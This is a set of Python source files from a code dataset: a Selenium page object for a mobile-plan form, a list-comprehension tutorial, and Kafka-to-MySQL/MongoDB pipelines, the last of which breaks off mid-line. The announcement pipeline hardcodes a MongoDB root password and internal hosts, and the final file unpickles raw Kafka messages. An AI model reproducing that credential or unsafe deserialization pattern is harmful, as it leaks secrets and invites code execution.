{"seq_id":"153807297","text":"import time\n\nfrom amaysim_fw.pages.basepage import BasePage\n\n\nclass NewPlanPage(BasePage):\n\n    def __init__(self, driver):\n        self.driver = driver\n\n    locator_dict = {\n        \"keep current number\": (\"//*[contains(text(), 'Keep your current number')]\", \"xpath\"),\n        \"get new number\": (\"//*[contains(text(), 'Get a new number')]\", \"xpath\"),\n        \"current number\": (\"previous_mobile_number_info_number\", \"id\"),\n        \"provider\": (\"previous_mobile_number_info_provider\", \"id\"),\n        \"prepaid\": (\"//*[contains(text(), 'Prepaid')]\", \"xpath\"),\n        \"postpaid\": (\"//*[contains(text(), 'Postpaid')]\", \"xpath\"),\n        \"dob\": (\"previous_mobile_number_info_number_dob\", \"id\"),\n        \"accnt number\": (\"previous_mobile_number_info_account_number\", \"id\"),\n        \"authorise\": (\"//*[contains(text(), 'authorise amaysim')]\", \"xpath\"),\n        \"new number\": (\"selected-number\", \"id\"),\n        \"submit\": (\"step-plan\", \"id\")\n    }\n\n    def setup_prepaid_using_current_number(self, number, provider, dob):\n        self.click_element(*self.locator_dict[\"keep current number\"])\n        self.send_text(*self.locator_dict[\"current number\"], number)\n        self.select_dropdown_value(*self.locator_dict[\"provider\"], provider)\n        self.click_element(*self.locator_dict[\"prepaid\"])\n        # this is only a workaround as the application offsets the value being sent by selenium\n        self.send_text_with_delay(*self.locator_dict[\"dob\"], dob[-1] + dob[0:-1])\n        
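# tick the \"authorise amaysim\" checkbox, then submit the form and wait for the next page to load\n        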
self.click_element(*self.locator_dict[\"authorise\"])\n        self.click_element(*self.locator_dict[\"submit\"])\n        self.wait_for_page_to_load()\n\n    def setup_postpaid_using_current_no(self, number, provider, accnt_no):\n        self.click_element(*self.locator_dict[\"keep current number\"])\n        self.send_text(*self.locator_dict[\"current number\"], number)\n        self.select_dropdown_value(*self.locator_dict[\"provider\"], provider)\n        self.click_element(*self.locator_dict[\"postpaid\"])\n        self.send_text(*self.locator_dict[\"accnt number\"], accnt_no)\n        self.click_element(*self.locator_dict[\"authorise\"])\n        self.click_element(*self.locator_dict[\"submit\"])\n        self.wait_for_page_to_load()\n\n    def setup_new_no(self):\n        self.click_element(*self.locator_dict[\"get new number\"])\n        self.click_element(*self.locator_dict[\"submit\"])\n        self.wait_for_page_to_load()\n\n","sub_path":"pages/userpages/newmobileplan/new_plan_page.py","file_name":"new_plan_page.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"183547812","text":"nums=list(range(10))\n# squares=[i**2 for i in nums]\n# #printing squares\n# print(\"\\nPrinting squares of nums\\n\")\n# for element in squares:\n#     print(element,end=\" \")\n# print(\"\\nPrinting odd numbers\\n\")\n# odd_numbers =[2*i -1 for i in nums]\n# for element in odd_numbers:\n#     print(element,end=\" \")\n#\n# print(\"\\nPrinting even numbers:\\n\")\n# even_numbers =[2*i for i in nums]\n# for element in even_numbers:\n#     print(element,end= \" \")\n\n# my_list=[]\n# for letter in 'abcd':\n#     for number in range(4):\n#         my_list.append((letter,number))\n# print(my_list)\n# names=['Bruce','Clark','Peter','Logan','Wade']\n# heros=['Batman','Superman','Spiderman','Wolverine','Deadpool']\n#\n# my_dict={}\n# for name,hero in zip(names,heros):\n#     my_dict[name]=hero\n# print(my_dict)\n# my_dict={name: hero for name,hero in zip(names,heros)}\n# print(my_dict)\n#creating generators in python\n\ndef gen_func(nums):\n    for i in nums:\n        yield i*i\nmy_gen=gen_func(nums)\nfor i in my_gen:\n    print(i)\n#generator expression\nmy_gen2=(n*n for n in nums)\n# the same loops can be applied to my_gen2\nprint(\"+\"*20)\nfor i in my_gen2:\n    print(i)\n","sub_path":"list_comprehensions.py","file_name":"list_comprehensions.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"162393438","text":"# -*- coding: utf-8 -*-\n# @Author : wgq\n# @time : 2020/8/10 17:47\n# @File : kafka_a.py\n# Software: PyCharm\n\"\"\"\nNEEQ (New Third Board) - stream processing built on mongoshake =>> kafka\n1. Read the data from kafka\n2. Read the full-name table and build a lookup dict\n3. Take the short name out of the kafka record -> look up the matching full name in the dict -> keep the full name in a variable\n4. Use the full name to join against the industry table -> fetch and keep the industry information\n5. Read the classification table -> convert it into a dataframe\n6. Match the kafka title against the dataframe -> obtain the classification info, sentiment score and importance score -> map the scores to their labels\n   -> on every match, check whether the classification table has changed; if it has, rebuild the dataframe\n7. Assemble the saved variables into the required lists -> persist them\n\"\"\"\nfrom kafka import KafkaConsumer\nimport json\nfrom mysql_yi import mysql_kafka_sq\nfrom kafka.structs import TopicPartition\nfrom bson import BSON\nimport pandas as pd\nfrom mysql_yi.mysql_pool import PymysqlPool\nimport uuid\nimport pymysql\nimport time, datetime\nimport pymongo\n\nclass Kafka_consumer_s():\n    def __init__(self):\n        \"\"\"\n        self.consumer: kafka consumer object\n        self.page: kafka consumption offset / processed-record counter\n        self.emo_label: sentiment score -> label map\n        self.imp_label: importance score -> label map\n        self.full_name_date: data of the full-name table\n        self.df: data of the classification table\n        self.companyName: full company name\n        self.mysql_full_name: industry data\n        self.title: title\n        self.srcUrl: source URL\n        self.pubTime: publish time\n        
self.cmpCode: short-name (stock) code\n        self.yqid: unique identifier\n        self.srcType: data type\n        self.webname: source site\n        self.cmpShortName: company short name\n        self.emoConf: confidence (not available for A-share data)\n        self.firstLevelCode: level-1 classification code\n        self.firstLevelName: level-1 classification name\n        self.secondLevelCode: level-2 classification code\n        self.secondLevelName: level-2 classification name\n        self.threeLevelCode: level-3 classification code\n        self.threeLevelName: level-3 classification name\n        self.fourLevelCode: level-4 classification code\n        self.fourLevelName: level-4 classification name\n        self.eventCode: public-opinion event classification code\n        self.eventName: public-opinion event classification name\n        self.emoScore: sentiment score\n        self.emolabel: sentiment label\n        self.impScore: importance score\n        self.impLabel: importance label\n        self.comp_info: industry classification dict\n        self.onlyId: mongo primary key\n        self.mydict: document to store in mongo\n\n        \"\"\"\n        self.consumer = KafkaConsumer(\"a_gu_add\",bootstrap_servers = [\"192.168.1.172:9092\"],auto_offset_reset='earliest')\n        self.myclient = pymongo.MongoClient(\"mongodb://root:shiye1805A@192.168.1.125:10011,192.168.1.126:10011,192.168.1.127:10011/admin\")\n\n        self.page = 0\n        # sentiment labels: positive / negative / neutral (stored values kept in Chinese)\n        self.emo_label = {'1': '正向', '-1': '负向', '0': '中性'}\n        # importance labels: 1-3 relatively unimportant, 4 important, 5 very important (stored values kept in Chinese)\n        self.imp_label = {'1': '相对不重要', '2': '相对不重要', '3': '相对不重要', '4': '重要', '5': '非常重要'}\n        self.full_name_date = {}\n        self.df = \"\"\n        self.companyName = \"\"\n        self.mysql_full_name = ()\n        self.title = \"\"\n        self.srcUrl = \"\"\n        self.pubTime = \"\"\n        self.cmpCode = \"\"\n        self.yqid = \"\"\n        self.srcType = \"\"\n        self.webname = \"\"\n        self.cmpShortName = \"\"\n        self.emoConf = \"\"\n        self.firstLevelCode = \"\"\n        self.firstLevelName = \"\"\n        self.secondLevelCode = \"\"\n        self.secondLevelName = \"\"\n        self.threeLevelCode = \"\"\n        self.threeLevelName = \"\"\n        self.fourLevelCode = \"\"\n        self.fourLevelName = \"\"\n        self.eventCode = \"\"\n        self.eventName = \"\"\n        self.emoScore = \"\"\n        self.emolabel = \"\"\n        self.impScore = \"\"\n        self.impLabel = \"\"\n        self.comp_info = {}\n        self.onlyId = \"\"\n        self.mydict = {}\n\n    def mysql_client(self):\n        return PymysqlPool('129')\n    def mysql_l(self):\n        \"\"\"\n        Query the industry table for this company's industry data\n        :param cmpShortName:\n        :return:\n        \"\"\"\n        if self.companyName:\n            conn = PymysqlPool('industry')\n            sql = \"SELECT A.compName, A.categoryCode, B.constValueDesc, B.constCode FROM(SELECT * FROM seeyii_assets_database.sy_cd_ms_ind_comp_gm WHERE compName = '{}') AS A INNER JOIN ( SELECT * FROM seeyii_assets_database.sy_cd_mt_sys_const WHERE constCode IN ( 3, 4, 5 ) ) AS B ON A.categoryCode = B.cValue\".format(\n                self.companyName)\n            counts, infos = conn.getAll(sql)\n            return infos\n        else:\n            return \"\"\n\n    def mysq_related_query_z(self):\n        \"\"\"\n        Connect to the full-name table\n        (queries A_stock_code_name_fyi for its data)\n        :return: the name dict we need\n        \"\"\"\n        if self.full_name_date:\n            pass\n        else:\n            print(\"building the name dict for the first time\")\n            conn = self.mysql_client()\n            commpany_map = {}\n            sql = \"select * from EI_BDP.A_stock_code_name_fyi;\"\n            count, infos = conn.getAll(sql)\n            for info in infos:\n                commpany_map[info['all_name']] = info['short_name']\n            conn.dispose()\n            self.full_name_date = commpany_map\n    def date_c(self,get_value):\n        \"\"\"\n        Look the short name up in the full-name dict\n        :param get_value: short name from kafka\n        :return: sets self.companyName\n        \"\"\"\n        if get_value in self.full_name_date.values():\n            self.companyName = list(self.full_name_date.keys())[list(self.full_name_date.values()).index(get_value)]\n            print(self.companyName)\n        else:\n            print(self.companyName)\n    def kafka_take_out(self):\n        \"\"\"\n        Consume messages from kafka and decode them into dicts\n        :return:\n        \"\"\"\n\n        for each in self.consumer:\n            # try:\n            kafa_str = BSON.decode(each.value)\n            if kafa_str:\n                self.kafka_data_processing(kafa_str)\n            # except:\n            #     print(each.value, \"bad data\")\n\n    def kafka_data_processing(self,kafka_json):\n        \"\"\"\n        Process the data and match it against the two tables\n        :param kafka_json: dict\n        :return:\n        \"\"\"\n\n        if kafka_json.get(\"o\"):\n            kafka_set = kafka_json.get(\"o\")\n            if kafka_set.get(\"$set\"):\n                pass\n            else:\n                self.page += 1\n                
print(self.page,\"+++++++++++++++++++++++++++++++++++++++++++++++++\")\n                kafka_of = kafka_json.get(\"o\")\n                cmpShortName = kafka_of.get(\"stock_name\")\n                cmpCode = kafka_of.get(\"stock_code\")\n                title = kafka_of.get(\"title\")\n                pubTime = kafka_of.get(\"etl_time\")\n                srcUrl = kafka_of.get(\"url\")\n                self.title = title\n                self.srcUrl = srcUrl\n                self.pubTime = pubTime\n                self.cmpCode = cmpCode\n                self.cmpShortName = cmpShortName\n                print(self.cmpShortName)\n                # ----------------------\n                self.mysq_related_query_z()\n                # ----------------------\n                self.date_c(cmpShortName)\n                # ----------------------\n                mysql_full_name = self.mysql_l()\n                self.mysql_full_name = mysql_full_name\n                # ----------------------\n                self.pd_dataframe(title)\n\n    def logs_dateframe(self):\n        \"\"\"\n        Check whether the classification table has changed since the last check\n        :return: False if it changed, True if it is unchanged\n        \"\"\"\n        with open(\"/shiye_kf3/gonggao/kafka_stream/logs/log_a.log\",\"r\") as r:\n            date_time = r.read()\n        print(date_time)\n        conn = self.mysql_client()\n        sql = \"SELECT count(id) FROM sy_yq_raw.sy_yq_lvl_rules_code WHERE modifyTime >= '{}'\".format(date_time)\n        count, infos = conn.getAll(sql)\n        conn.dispose()\n        dateArray = datetime.datetime.fromtimestamp(time.time())\n        otherStyleTime = dateArray.strftime(\"%Y-%m-%d %H:%M:%S\")\n        page = infos[0][\"count(id)\"]\n        print(page, \"classification rows changed since the last check\")\n        with open(\"/shiye_kf3/gonggao/kafka_stream/logs/log_a.log\",\"w\") as w:\n            w.write(otherStyleTime)\n        if page > 0:\n            return False\n        else:\n            return True\n\n    def pd_dataframe(self,test):\n        \"\"\"\n        Fetch the rules dataframe and match the title against it\n        :param test: title\n        :return:\n        \"\"\"\n        if test:\n            if len(self.df):\n                pass\n            else:\n                self.pandsa()\n                print(\"first run, building the rules dataframe\")\n                print(self.len_list)\n            bool_if = self.logs_dateframe()\n            if bool_if:\n                print(\"classification table unchanged\")\n            else:\n                self.pandsa()\n                print(\"classification table changed -- rebuilding the dataframe\")\n            for i in range(self.len_list):\n                inRules_list = [self.df.loc[i,\"inRules\"]][0]\n                filterRules_list = [self.df.loc[i, \"filterRules\"]][0]\n                in_list = [rule.strip() for rule in inRules_list.split('、') if inRules_list]\n                in_lists = [rule.split('&') for rule in in_list]\n                filter_rules = [[rule.strip()] for rule in filterRules_list.split('、') if filterRules_list]\n                if_csv = self.list_if(in_lists,filter_rules,test)\n                if if_csv:\n                    print(\"match found, saving\")\n                    self.pands_dateframe_csv(i)\n                else:\n                    pass\n    def list_if(self,in_lists,filter_rules,test):\n\n        \"\"\"\n        Evaluate the incoming title against the rules\n        :param in_lists: inclusion rules; check whether the title satisfies them\n        :param filter_rules: exclusion rules; check whether the title violates them\n        :param test: title\n        :return:\n        \"\"\"\n        is_match = False\n        for words in in_lists:\n            result = self.pandas_dataframe_if(words, test)\n            if result == words:\n                is_match = True\n                break\n        if filter_rules and is_match:\n            for fwords in filter_rules:\n                filter_result = self.pandas_dataframe_if(fwords, test)\n                if filter_result == fwords:\n                    is_match = False\n                    break\n        return is_match\n    def pandas_dataframe_if(self,words,test):\n        \"\"\"\n        Check the split rule words against the title and return the matches to the caller\n        :param words:\n        :param test:\n        :return:\n        \"\"\"\n        result = []\n        for word in words:\n            if word in test:\n                result.append(word)\n        return result\n    def pandsa(self):\n        \"\"\"\n        Read the classification table and convert it into a dataframe\n        :return:\n        \"\"\"\n        conn = self.mysql_client()\n        sql = \"SELECT id,firstLevelCode,firstLevelName,secondLevelCode,secondLevelName,threeLevelCode,threeLevelName,fourLevelCode,fourLevelName,cfEventCode,eventCode,eventName,inRules,filterRules,emoScore,impScore,isChange,isValid,dataStatus FROM sy_yq_raw.sy_yq_lvl_rules_code WHERE inRules != '' and inRules IS NOT NULL\"\n        count, infos = conn.getAll(sql)\n        conn.dispose()\n        self.len_list = 
len(infos)\n        df = pd.DataFrame(data=infos,columns=[\"id\",\"firstLevelCode\",\"firstLevelName\",\"secondLevelCode\",\"secondLevelName\",\"threeLevelCode\",\"threeLevelName\",\"fourLevelCode\",\"fourLevelName\",\"cfEventCode\",\"eventCode\",\"eventName\",\"inRules\",\"filterRules\",\"emoScore\",\"impScore\",\"isChange\",\"isValid\",\"dataStatus\"])\n        self.df = df\n    def mysql_full_name_data(self):\n        self.comp_info = {}\n        if self.mysql_full_name:\n            for sin in self.mysql_full_name:\n                if sin.get(\"constCode\") == 3:\n                    self.comp_info['firstIndustry'] = sin.get(\"constValueDesc\")\n                    self.comp_info['firstIndustryCode'] = str(sin.get(\"categoryCode\")) + \"##\" + str(sin.get(\"constCode\"))\n                elif sin.get(\"constCode\") == 4:\n                    self.comp_info['secondIndustry'] = sin.get(\"constValueDesc\")\n                    self.comp_info['secondIndustryCode'] = str(sin.get(\"categoryCode\")) + \"##\" + str(sin.get(\"constCode\"))\n                elif sin.get(\"constCode\") == 5:\n                    self.comp_info['threeIndustry'] = sin.get(\"constValueDesc\")\n                    self.comp_info['threeIndustryCode'] = str(sin.get(\"categoryCode\")) + \"##\" + str(sin.get(\"constCode\"))\n    def pands_dateframe_csv(self,i):\n        \"\"\"\n        Persist the matched result\n        :param i: row index into the dataframe\n        :return:\n        \"\"\"\n        self.webname = \"巨潮资讯网\"\n        self.srcType = \"A股公告\"\n        print(self.title)\n        if self.title:\n            self.mysql_full_name_data()\n            self.yqid = self.add_uuid(self.title + self.srcUrl + self.pubTime)\n            self.firstLevelCode = self.df.loc[i, \"firstLevelCode\"]\n            self.firstLevelName = self.df.loc[i, \"firstLevelName\"]\n            self.secondLevelCode = self.df.loc[i, \"secondLevelCode\"]\n            self.secondLevelName = self.df.loc[i, \"secondLevelName\"]\n            self.threeLevelCode = self.df.loc[i, \"threeLevelCode\"]\n            self.threeLevelName = self.df.loc[i, \"threeLevelName\"]\n            self.fourLevelCode = self.df.loc[i, \"fourLevelCode\"]\n            if self.df.loc[i, \"fourLevelName\"]:\n                self.fourLevelName = self.df.loc[i, \"fourLevelName\"]\n            else:\n                self.fourLevelName = \"\"\n            self.eventCode = self.df.loc[i, \"eventCode\"]\n            self.eventName = self.df.loc[i, \"eventName\"]\n            self.emoScore = self.df.loc[i, \"emoScore\"]\n            self.impScore = self.df.loc[i, \"impScore\"]\n            list_g = self.list_mysql_g_gao()\n            list_yu = self.list_mysql_u_s()\n            print(list_g)\n            print(\"``````````````\")\n            print(list_yu)\n            self.mysql_insert_g_gao(list_g)\n            self.mysql_insert_u_yuqing(list_yu)\n            self.mongo_insert()\n    def list_mysql_g_gao(self):\n        \"\"\"\n        Assemble the data into the row structure required by the announcement table\n        :return:\n        \"\"\"\n        list_mysql_g_s = []\n        list_mysql_g = []\n        list_mysql_g.append(self.yqid)\n        list_mysql_g.append(self.title)\n        list_mysql_g.append(self.webname)\n        list_mysql_g.append(self.companyName)\n        list_mysql_g.append(self.cmpShortName)\n        list_mysql_g.append(self.cmpCode)\n        list_mysql_g.append(\"\")\n        list_mysql_g.append(\"\")\n        list_mysql_g.append(\"\")\n        list_mysql_g.append(self.comp_info.get(\"firstIndustry\",\"\"))\n        list_mysql_g.append(self.comp_info.get(\"firstIndustryCode\",\"\"))\n        list_mysql_g.append(self.comp_info.get(\"secondIndustry\",\"\"))\n        list_mysql_g.append(self.comp_info.get(\"secondIndustryCode\",\"\"))\n        list_mysql_g.append(self.comp_info.get(\"threeIndustry\",\"\"))\n        list_mysql_g.append(self.comp_info.get(\"threeIndustryCode\",\"\"))\n        list_mysql_g.append(self.firstLevelCode)\n        list_mysql_g.append(self.firstLevelName)\n        list_mysql_g.append(self.secondLevelCode)\n        list_mysql_g.append(self.secondLevelName)\n        list_mysql_g.append(self.threeLevelCode)\n        list_mysql_g.append(self.threeLevelName)\n        list_mysql_g.append(self.fourLevelCode)\n        list_mysql_g.append(self.fourLevelName)\n        
list_mysql_g.append(self.eventCode)\n        list_mysql_g.append(self.eventName)\n        list_mysql_g.append(self.emoScore)\n        self.emolabel = self.emoLabel_i()\n        list_mysql_g.append(self.emolabel)\n        list_mysql_g.append(self.emoConf)\n        list_mysql_g.append(self.impScore)\n        self.impLabel = self.impLabel_i()\n        list_mysql_g.append(self.impLabel)\n        list_mysql_g.append(self.srcType)\n        list_mysql_g.append(self.srcUrl)\n        list_mysql_g.append(self.pubTime)\n        list_mysql_g_s.append(list_mysql_g)\n        return list_mysql_g_s\n    def list_mysql_u_s(self):\n        \"\"\"\n        Assemble the data into the row structure required by the public-opinion table\n        :return:\n        \"\"\"\n        transScore = \"\"\n        relPath = \"\"\n        personName = \"\"\n        relType = \"直接关联\"  # stored value kept in Chinese: \"directly related\"\n        summary = \"\"\n        keyword = \"\"\n        content = \"\"\n        relScore = \"\"\n        relLabel = \"\"\n        list_mysql_u_s = []\n        list_mysql_u = []\n        list_mysql_u.append(self.yqid)\n        list_mysql_u.append(self.companyName)\n        list_mysql_u.append(self.cmpShortName)\n        list_mysql_u.append(self.cmpCode)\n        list_mysql_u.append(self.companyName)\n        list_mysql_u.append(transScore)\n        list_mysql_u.append(relPath)\n        list_mysql_u.append(relType)\n        list_mysql_u.append(relScore)\n        list_mysql_u.append(relLabel)\n        list_mysql_u.append(personName)\n        list_mysql_u.append(self.eventCode)\n        list_mysql_u.append(self.eventName)\n        list_mysql_u.append(self.firstLevelCode)\n        list_mysql_u.append(self.firstLevelName)\n        list_mysql_u.append(self.secondLevelCode)\n        list_mysql_u.append(self.secondLevelName)\n        list_mysql_u.append(self.threeLevelCode)\n        list_mysql_u.append(self.threeLevelName)\n        list_mysql_u.append(self.fourLevelCode)\n        list_mysql_u.append(self.fourLevelName)\n        self.emolabel = self.emoLabel_i()\n        list_mysql_u.append(self.emolabel)\n        list_mysql_u.append(self.emoScore)\n        list_mysql_u.append(self.emoConf)\n        list_mysql_u.append(self.impScore)\n        self.impLabel = self.impLabel_i()\n        list_mysql_u.append(self.impLabel)\n        list_mysql_u.append(self.pubTime)\n        list_mysql_u.append(self.title)\n        list_mysql_u.append(summary)\n        list_mysql_u.append(keyword)\n        list_mysql_u.append(self.srcUrl)\n        list_mysql_u.append(self.srcType)\n        list_mysql_u.append(self.webname)\n        list_mysql_u.append(content)\n        list_mysql_u_s.append(list_mysql_u)\n        return list_mysql_u_s\n    def impLabel_i(self):\n        \"\"\"\n        Map the importance score to its label\n        :param impScore: importance score\n        :return: importance label\n        \"\"\"\n        imp_label = self.imp_label.get(str(self.impScore))\n        return imp_label\n    def emoLabel_i(self):\n        \"\"\"\n        Map the sentiment score to its label\n        :param emoScore: sentiment score\n        :return: sentiment label\n        \"\"\"\n        emo_label = self.emo_label.get(str(self.emoScore))\n        return emo_label\n    def add_uuid(self,data):\n        \"\"\"\n        Hash the string into a hex id\n        :return: hashed string\n        \"\"\"\n        data = uuid.uuid3(uuid.NAMESPACE_DNS, data)\n        data = str(data)\n        result_data = data.replace('-', '')\n        return result_data\n\n    def mysql_insert_g_gao(self,result):\n        \"\"\"\n        Store the data into the announcement table\n        :param result:\n        :return:\n        \"\"\"\n        conn = self.mysql_client()\n        sql = \"\"\"INSERT INTO sy_project_raw.aa_dws_ggyq_search_add (yqid,\n        title,\n        webname,\n        companyName,\n        cmpShortName,\n        cmpCode,\n        bondFull,\n        bondAbbr,\n        bondCode,\n        firstIndustry,\n        firstIndustryCode,\n        secondIndustry,\n        secondIndustryCode,\n        threeIndustry,\n        threeIndustryCode,\n        firstLevelCode,\n        firstLevelName,\n        secondLevelCode,\n        secondLevelName,\n        threeLevelCode,\n        threeLevelName,\n        fourLevelCode,\n        fourLevelName,\n        eventCode,\n        eventName,\n        emoScore,\n        emoLabel,\n        emoConf,\n        impScore,\n        impLabel,\n        srcType,\n        srcUrl,\n        pubTime) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\"\"\n        conn.insertMany(sql, result)\n        
conn.dispose()\n        print(\"saved to aa_dws_ggyq_search_add\")\n    def mysql_insert_u_yuqing(self,result):\n        \"\"\"\n        Store the data into the public-opinion table\n        :param result:\n        :return:\n        \"\"\"\n        conn = self.mysql_client()\n        sql = \"\"\"INSERT INTO sy_project_raw.dwa_me_yq_search_add (yqid,\n        objName,\n        companyShortName,\n        companyCode,\n        indirectObjName,\n        transScore,\n        relPath,\n        relType,\n        relScore,\n        relLabel,\n        personName,\n        eventCode,\n        eventName,\n        firstLevelCode,\n        firstLevelName,\n        secondLevelCode,\n        secondLevelName,\n        thirdLevelCode,\n        thirdLevelName,\n        fourthLevelCode,\n        fourthLevelName,\n        emoLabel,\n        emoScore,\n        emoConf,\n        impScore,\n        impLabel,\n        pubTime,\n        title,\n        summary,\n        keyword,\n        srcUrl,\n        srcType,\n        source,\n        content) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\"\"\n        conn.insertMany(sql, result)\n        conn.dispose()\n        print(\"saved to dwa_me_yq_search_add\")\n    def mongo_date(self):\n        \"\"\"\n        Build the document that mongo needs\n        :return:\n        \"\"\"\n        dateArray = datetime.datetime.fromtimestamp(time.time())\n        otherStyleTime = dateArray.strftime(\"%Y-%m-%d %H:%M:%S\")\n        transScore = \"\"\n        relPath = \"\"\n        personName = \"\"\n        relType = \"直接关联\"\n        summary = \"\"\n        keyword = \"\"\n        content = \"\"\n        relScore = \"\"\n        relLabel = \"\"\n        self.emolabel = self.emoLabel_i()\n        self.impLabel = self.impLabel_i()\n        self.mydict[\"onlyId\"] = self.onlyId\n        self.mydict[\"yqid\"] = self.yqid\n        self.mydict[\"objName\"] = self.companyName\n        self.mydict[\"companyShortName\"] = self.cmpShortName\n        self.mydict[\"companyCode\"] = self.cmpCode\n        self.mydict[\"indirectObjName\"] = self.companyName\n        self.mydict[\"transScore\"] = transScore\n        self.mydict[\"relPath\"] = relPath\n        self.mydict[\"relType\"] = relType\n        self.mydict[\"relScore\"] = relScore\n        self.mydict[\"relLabel\"] = relLabel\n        self.mydict[\"personName\"] = personName\n        self.mydict[\"eventCode\"] = self.eventCode\n        self.mydict[\"eventName\"] = self.eventName\n        self.mydict[\"firstLevelCode\"] = self.firstLevelCode\n        self.mydict[\"firstLevelName\"] = self.firstLevelName\n        self.mydict[\"secondLevelCode\"] = self.secondLevelCode\n        self.mydict[\"secondLevelName\"] = self.secondLevelName\n        self.mydict[\"thirdLevelCode\"] = self.threeLevelCode\n        self.mydict[\"thirdLevelName\"] = self.threeLevelName\n        self.mydict[\"fourthLevelCode\"] = self.fourLevelCode\n        self.mydict[\"fourthLevelName\"] = self.fourLevelName\n        self.mydict[\"emoLabel\"] = self.emolabel\n        self.mydict[\"emoScore\"] = self.emoScore\n        self.mydict[\"emoConf\"] = self.emoConf\n        self.mydict[\"impScore\"] = self.impScore\n        self.mydict[\"impLabel\"] = self.impLabel\n        self.mydict[\"pubTime\"] = self.pubTime\n        self.mydict[\"title\"] = self.title\n        self.mydict[\"summary\"] = summary\n        self.mydict[\"keyword\"] = keyword\n        self.mydict[\"srcUrl\"] = self.srcUrl\n        self.mydict[\"srcType\"] = self.srcType\n        self.mydict[\"source\"] = self.webname\n        self.mydict[\"content\"] = content\n        self.mydict[\"isValid\"] = 1\n        self.mydict[\"dataStatus\"] = 1\n        self.mydict[\"createTime\"] = otherStyleTime\n        self.mydict[\"modifyTime\"] = otherStyleTime\n    def mongo_insert(self):\n        \"\"\"\n        Store the document in mongo\n        :return:\n        \"\"\"\n        mydb = self.myclient[\"sy_project_raw\"]\n        mycol = mydb[\"dwa_me_yq_search\"]\n        self.onlyId = self.add_uuid(self.yqid+self.companyName+str(self.eventCode))\n        self.mongo_date()\n        print(self.mydict)\n        my_dict_new = {}\n        try:\n            my_dict_new.update(self.mydict)\n            mycol.insert(my_dict_new)\n        except:\n            print(\"duplicate document\")\n        print(\"saved one copy to mongo\")\n\ndef main():\n    
\"\"\"\n    Entry point: build the consumer and start processing\n    :return:\n    \"\"\"\n    kafka_losd = Kafka_consumer_s()\n    kafka_losd.kafka_take_out()\nif __name__ == '__main__':\n    main()\n\n","sub_path":"kafka_stream/kafka_a.py","file_name":"kafka_a.py","file_ext":"py","file_size_in_byte":28312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"137612140","text":"# pylint: disable=protected-access\nfrom __future__ import absolute_import, division, print_function\nimport os\nimport sys\nimport gc\nimport uuid\nimport time\nimport io\nimport multiprocessing\nfrom kafka import KafkaConsumer\nimport msg_queue\n\nif sys.version < '3':\n    import cPickle as pickle\nelse:\n    import pickle\n\n    unicode = str\n\n\ndef dump(value, f):\n    try:\n        pickle.dump(value, f, 2)\n    except pickle.PickleError:\n        raise\n    except Exception as e:\n        msg = \"Could not serialize broadcast: %s\" % str(e)\n        print(msg, file=sys.stderr)\n        raise pickle.PicklingError(msg)\n    f.close()\n    return f.name\n\n\ndef load(path):\n    try:\n        with open(path, 'rb', 1 << 20) as f:\n            # pickle.load() may create lots of objects, disable GC\n            # temporary for better performance\n            gc.disable()\n            try:\n                return pickle.load(f)\n            finally:\n                gc.enable()\n    except Exception:\n        return []\n\n\nfilename = os.path.join(os.getcwd(), \"python_temp.pickle\")\n_params = load(\"{}\".format(filename))\nprint(\"params from parent: {}\".format(_params))\n\nif \"kafkaParam\" in _params:\n    kafka_param = _params[\"kafkaParam\"]\n\nif \"fitParam\" in _params:\n    fit_param = _params[\"fitParam\"]\n\nif \"internalSystemParam\" in _params:\n    internal_system_param = _params[\"internalSystemParam\"]\n\nif \"systemParam\" in _params:\n    systemParam = _params[\"systemParam\"]\n\nvalidate_table_filename = os.path.join(os.getcwd(), \"validate_table.pickle\")\nraw_validate_data = load(validate_table_filename)\nvalidate_data = []\nfor item in raw_validate_data:\n    with io.BytesIO(item) as f:\n        msg = pickle.load(f)\n    validate_data.append(msg)\n\n\ndef read_data():\n    # Update params\n    # os.environ.get('pickleFile')\n    if \"debug\" in kafka_param and kafka_param[\"debug\"]:\n        import logging\n        logging.basicConfig(level=logging.DEBUG)\n\n    authkey = uuid.uuid4().bytes\n    mgr = msg_queue.start(authkey=authkey, queue_max_size=10, queues=['input'])\n\n    def from_kafka(args, mgr):\n        consumer = KafkaConsumer(kafka_param[\"topic\"],\n                                 group_id=kafka_param[\"group_id\"],\n                                 bootstrap_servers=kafka_param[\"bootstrap.servers\"],\n                                 auto_offset_reset=\"earliest\",\n                                 enable_auto_commit=False\n                                 )\n\n        max_records = args[\"max_records\"]\n        no_message_count = 0\n        no_message_time = 5\n        try:\n            stop_count = 0\n            fail_msg_count = 0\n            while True:\n                messages = consumer.poll(timeout_ms=1000, max_records=max_records)\n                queue = mgr.get_queue(\"input\")\n                group_msgs_count = 0\n                group_msgs = []\n                for tp, records in messages.items():\n                    for record in records:\n                        try:\n                            with io.BytesIO(record.value) as f:\n                                msg_value = pickle.load(f)\n                            if msg_value == \"_stop_\":\n                                stop_count += 1\n                            else:\n                                group_msgs.append(msg_value)\n                                group_msgs_count += 1\n                        except:\n                            fail_msg_count += 1\n                            print(\"unpickle from kafka fail\")\n                            sys.stdout.flush()\n                            pass\n                if len(group_msgs) > 0:\n                    no_message_count = 0\n                    queue.put(group_msgs, block=True)\n\n                if len(group_msgs) == 0 and no_message_count < 10:\n                    time.sleep(no_message_time)\n                    no_message_count += 1\n\n                if (stop_count >= internal_system_param[\"stopFlagNum\"] and group_msgs_count == 0) or (\n                        no_message_count >= 10 and group_msgs_count == 0):\n                    queue.put([\"_stop_\"], block=True)\n                    print(\n                        \"no 
